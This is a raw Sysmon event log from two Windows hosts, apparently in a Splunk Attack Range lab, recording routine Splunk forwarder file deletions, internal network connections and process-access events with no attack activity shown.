23542300x8000000000000000284992Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:06.056{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD25E202393D810AAFD5B11E50E6DA4E,SHA256=D19B30CDAE3BD1163DF63C2B7D65442E852CCE978F2208FA762AA54B3B56CDEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214117Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:07.403{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FBC198F6150B82265D11D77096A937F,SHA256=A2C9F9E46E8A05B50AF87623C4CEA5BD9D76D347DB74FF3B5167C43C7FFB756F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284994Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:04.596{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53219-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284993Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:07.135{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDAC9474A24EEABE42494ACD2E1ED2F0,SHA256=E8E3E936A97B9DF7F49FC579480259D59EA1856BE917CA94A0AEC6798FB55680,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284995Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:08.181{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFCEFEF1E5746DF32B3639273B156042,SHA256=CBB93A9FB221922E7D066C8243073AB3D01877549E23EFFF9B431116EF09E99B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214118Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:08.419{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F31EA62B7F8EBA4726CC735981E9DF9,SHA256=5C15874DB9CFCC5578A8D48110EB993F7B1BB0BC0F877B933714A2133B3BF7E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284996Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:09.338{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48A02BEF10F4524A774AF3650ADAC10A,SHA256=B994EDEA1B65C5F2566BF1033C79C3BA4F24155CC0FA112A822C9834C18D8F40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214119Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:09.434{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3FFBF13F937B44A896BD4A44AA31585,SHA256=06AD775F1C872EACC7340B2015AA6F1FE4348B0070234C5BB6FFFE3FC4B3C735,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284997Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:10.463{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09271817DB57022D1EC2B4719EA587B1,SHA256=94A77E7032D0AC59C3E2412250B452B550320E3772200F26DDCF896841D8B538,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214121Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:07.576{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51167-false10.0.1.12-8000- 23542300x8000000000000000214120Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:10.450{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4945FC835518F6A6CBD4632AD5213578,SHA256=AB5247147DC7C9838E559A334B9DE0EF256F92A2C29906ADC538FA00561FCFF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284998Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:11.572{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73193CC8F3E0746B2079406D0AFBDEDD,SHA256=CE7425C28CD15ED2E9EB7B5A68E44D0F2B863A2BE509C75D1E3948959029757A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214122Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:11.466{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB657357F903B1EF93521D268AC66406,SHA256=23063356E91DD423E0D3C8AE04DCE99A93BFD091664C9F2BDBFD0FC2E3318AA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214123Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:12.481{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFA7C16E0EA0B086773D832104221D11,SHA256=068F2CD3ABF3A4667F63BEB240032D56AB2AC57B714073730371FABF0BF6E15A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285000Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:09.705{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53220-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284999Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:12.603{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=721A3698E23BDBB9967C03FFF25290A2,SHA256=943567030753F1218DB364B9B65E923CFEB7FFA62E43D37EF40DA47CCDADD452,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285001Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:13.619{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E96F477E425E46E2B461A919E6AAA1EF,SHA256=09D7271BFF2F5B60D0F539593C3FA393EBDF7D1846F5FD471FCA0AEFD833516D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214124Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:13.497{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07293859314DBD97D4078CC908189A73,SHA256=524B70381B02C6549ED4970C78202C68F0E1AC3C549BB1A6C6392003A484F2C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214125Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:14.513{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0E732353A1D14FCC20C4AA5D48AC38B,SHA256=8B68BC5C4C49B9FF1269647DB552649C6737D4F4C6E1FC9F522EDD38ABA46A7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285002Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:14.635{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E967E8B8C3B67853D4396E82611C7637,SHA256=C5CAD94944881C61E6C4507B83755271DD7502AF9A81A67D9CA16B0852541CFF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214127Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:13.607{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51168-false10.0.1.12-8000- 23542300x8000000000000000214126Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:15.528{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B315B8519D6BD51BDC7052928DF236C,SHA256=65AFECAB5CCB62700279EBB0FD17883E9E65A851AA20CC13FF8EA3760BA90ADA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285005Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:15.650{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C58B39962770D7BF9F5CB22B4AF231C,SHA256=3566C218DC4207C31280AC16ECFDB122685CAF79AC16CDA6C3BCBF4BCF745715,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285004Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:15.041{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B71BF9B91D48810192A32E164AD9DB3,SHA256=30CCCBAA707C0B52C7F95B65B111F064369BB3F3ACBCFDB419A94B224BB31228,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285003Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:15.041{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B460961927BA616AF5BB2046CBFD6606,SHA256=B1BBF389FD47FDE3DA401ABB7178CA7F01E49DB83770980F49E78FCCD5AC56A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285006Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:16.681{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=888632557DAF3D65A062D4FCE4D774D0,SHA256=DBB5A995B8B75220670E3AFA2BDF84665E77232D1AD55853EEC59747D28A423C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214128Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:16.528{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FA876EDB95EB68869CA96991A8970C3,SHA256=CCE8F8F59F87B6DF63B9864F962AB16656C96C3D9810A8A13760816BA8AC4361,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285007Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:17.728{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A6D40EEFF48A31200CDF2C7A35AA47D,SHA256=D60D40ACAA332F4C01A5D9D7C7CB2F723A25602B83DB0A4CE4E1544046060C88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214129Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:17.528{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2752315EE55D4AE1B4B85F2BD65D6AEE,SHA256=9A9F070CF8E7E421C3DF028B9958C0D8E04B8E6660648CD833CD192237C6C8E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285009Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:18.775{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8EF11398AD22F99873509A792737389,SHA256=50BDDF3B4084F6D8F51CCCBE2E0CCB0CB4DA4FD71921E39C6DEE0ECDFB8AF215,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214130Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:18.544{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26FEB05DA48021EF4EB926BFC172B5E5,SHA256=973B28A204F7BD02FCBFA6E6D1A3424095E80F10FF149F91C6535DA5FEB4D066,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285008Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:15.612{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53221-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000285019Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:19.900{C8EA50B7-0E23-6216-A104-000000003802}55641076C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285018Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:19.838{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06E0C77AF1C08C9B4CD20441E39AC2A9,SHA256=395A2F8EE92DC202576CE713233E09C166EE7517193B2BF7C7E63E62B1F3206F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214131Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:19.559{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66798FBE7A16598EAF0F41990867DA1D,SHA256=708EBFF4E1D117AE8B9AEC0861B8E2D2ABD9E13258A218E40EEF929FE2736BDC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285017Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:19.541{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E23-6216-A104-000000003802}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285016Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:19.541{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285015Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:19.541{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285014Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:19.541{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285013Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:19.541{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285012Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:19.541{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0E23-6216-A104-000000003802}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285011Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:19.541{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E23-6216-A104-000000003802}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285010Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:19.542{C8EA50B7-0E23-6216-A104-000000003802}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 